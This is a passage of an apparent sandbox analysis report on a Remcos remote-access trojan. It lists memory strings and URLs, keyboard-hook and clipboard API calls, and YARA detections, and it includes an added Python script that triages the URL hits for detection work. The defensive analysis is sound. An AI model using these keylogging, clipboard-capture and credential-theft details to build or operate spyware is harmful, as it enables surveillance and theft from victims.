                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                    Source: wmplayer.exe, 00000006.00000003.2210276117.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp&V
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, regedit.exe, 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp=M
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpGM
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpQM
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl;
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
                    Source: wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/p
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0:
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0S
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://ocspx.digicert.com0E
                    Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0~
                    Source: wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194687494.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: wmplayer.exe, 0000000F.00000002.2194687494.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                    Source: wmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: wmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
                    Source: wmplayer.exe, 0000000D.00000002.2210606023.0000000000D24000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: wmplayer.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                    Source: wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: wmplayer.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhvCBB7.tmp.13.drString found in binary or memory: https://www.office.com/
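Triage note and added example (not part of the Joe Sandbox report): the URL list above mixes two very different kinds of hit. Strings reported from wmplayer.exe or regedit.exe process memory and from the submitted sample are the implant's own (geoplugin.net/json.gp is the Remcos geolocation check-in; the nirsoft.net, imvu.com and ebuddy.com strings are consistent with the NirSoft-derived credential-recovery code Remcos carries), while everything reported from bhvCBB7.tmp.13.dr is browser-cache content that the stealer read out of the victim profile: DigiCert CRL/OCSP/AIA URLs, Office and MSN CDN assets, Skype and OneDrive config. Those should not be turned into blocklist entries; the C2 is in the extracted malware configuration, not here. The trailing bytes on many entries are string-scanner residue rather than part of the URL: the '0' after .crt, .crl or .com is the 0x30 SEQUENCE tag of the next DER element in a parsed certificate, and '&V', '=M', 'System32' after json.gp are whatever followed the string in memory. The Python below, written for this page with a handful of the lines above as constructed input, parses the fused 'Source: ...String found in binary or memory:' lines, splits concatenated URLs, strips that residue and separates implant strings from harvested ones. The bucket names and the junk-tail heuristic are this example's own choices.

```python
"""Separate implant URLs from harvested browser-cache URLs in Joe Sandbox string hits.

Added example for this page, not code from Joe Sandbox or from Remcos.
SAMPLE_LINES are built from lines of the report above (constructed test input);
the bucket names and the junk-tail heuristic are this example's own choices.
"""
import re
from collections import defaultdict

BHV = "bhvCBB7.tmp.13.dr"                       # dropped browser-cache temp file
AMC = "Amcache.hve.10.dr"                       # OS artefact, not implant data
WMP6 = "wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp"
WMP15 = "wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp"
MIX = ("IB9876789000.bat.exe, 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, "
       "regedit.exe, 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp")


def hit(source, value):
    """Rebuild a report line in the fused form the extracted page uses."""
    return "Source: %sString found in binary or memory: %s" % (source, value)


SAMPLE_LINES = [
    hit(BHV, "http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B"),
    hit(BHV, "http://crl3.digicert.com/DigiCertGlobalRootCA.crl07"),
    hit(BHV, "http://ocsp.digicert.com0:"),
    hit(BHV, "https://www.office.com/"),
    hit(WMP6, "http://geoplugin.net/"),
    hit(WMP6, "http://geoplugin.net/json.gp"),
    hit(WMP6, "http://geoplugin.net/json.gp&V"),
    hit(MIX, "http://geoplugin.net/json.gp/C"),
    hit(WMP6, "http://geoplugin.net/json.gpSystem32"),
    hit(WMP6, "http://geoplugin.net/p"),
    hit(WMP15, "http://www.nirsoft.net/"),
    hit(WMP15, "http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com"),
    hit(AMC, "http://upx.sf.net"),
]

LINE_RE = re.compile(r"^Source:\s*(?P<source>.*?)String found in binary or memory:\s*(?P<value>.*)$")
SCHEME_SPLIT = re.compile(r"(?=(?:https?|file)://)")          # concatenated URLs share no separator
URL_RE = re.compile(r"^(?:https?|file)://[A-Za-z0-9._~:/?#@!$&'()*+,;=%-]+")
# A URI inside an X.509 AIA/CRLDP extension is followed by the 0x30 ('0') SEQUENCE
# tag of the next DER element, so '.crt0B', '.crl07', '.com0:' are certificate residue.
DER_TAIL = re.compile(r"(\.(?:crt|crl|com)|/CPS)0[^/]{0,2}$")


def classify_source(source):
    """Bucket by the first source token: dropped files carry a '.dr' suffix."""
    first = source.split(",")[0].strip()
    if first.startswith("bhv") and first.endswith(".dr"):
        return "harvested browser cache"
    if first.endswith(".dr"):
        return "other dropped/OS artefact"
    return "implant memory"


def extract_urls(value):
    """Split 'http://ahttp://b' style runs into individual URLs."""
    return [m.group(0) for m in (URL_RE.match(p) for p in SCHEME_SPLIT.split(value)) if m]


def strip_der_tail(url):
    return DER_TAIL.sub(r"\1", url)


def looks_like_junk(tail):
    """Short, dot-free tails that are not a real path segment are scanner residue."""
    if len(tail) > 8 or "." in tail:
        return False
    if tail.startswith("/") and len(tail) >= 3:
        return False
    return True


def collapse_junk_tails(urls):
    """Drop 'h/json.gp&V' when 'h/json.gp' is also present (longest prefix wins)."""
    keep = set(urls)
    by_len = sorted(urls, key=len, reverse=True)
    for url in by_len:
        for cand in by_len:
            if cand != url and url.startswith(cand) and looks_like_junk(url[len(cand):]):
                keep.discard(url)
                break
    return keep


def triage(lines):
    buckets = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        bucket = classify_source(m.group("source"))
        for url in extract_urls(m.group("value")):
            buckets[bucket].add(strip_der_tail(url))
    return {b: sorted(collapse_junk_tails(u)) for b, u in buckets.items()}


if __name__ == "__main__":
    for bucket, urls in triage(SAMPLE_LINES).items():
        print(bucket)
        for url in urls:
            print("   ", url)
```

Only the "implant memory" bucket is worth feeding into detection content; the same script run over the full report text collapses the geoplugin variants to two entries and leaves the DigiCert and CDN noise in the harvested bucket.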

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000006_2_004099E4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,6_2_00409B10
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041BB77 SystemParametersInfoW,6_2_0041BB77

                    System Summary

                    Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
